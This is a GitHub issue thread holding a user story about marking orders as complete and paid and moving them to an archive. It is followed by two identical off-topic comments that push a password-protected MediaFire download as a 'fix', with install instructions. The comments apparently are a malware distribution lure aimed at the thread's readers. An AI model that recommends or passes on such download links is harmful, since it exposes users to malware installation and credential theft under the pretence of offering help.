### ISSUE TITLE
Can set an order as complete+paid to move them out to archive

### ISSUE THREAD

**Issue by dimispapa** [dimispapa/slotted-need#26]
As a **user** I can **set an order as complete & paid** so that **I can move it out of existing orders into archive**

### Acceptance Criteria

- Can click a button next to the order to declare as complete & paid

- The order gets moved out from the order view into archived orders

- User can move archived orders back to existing orders in case of a mistake or changes

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
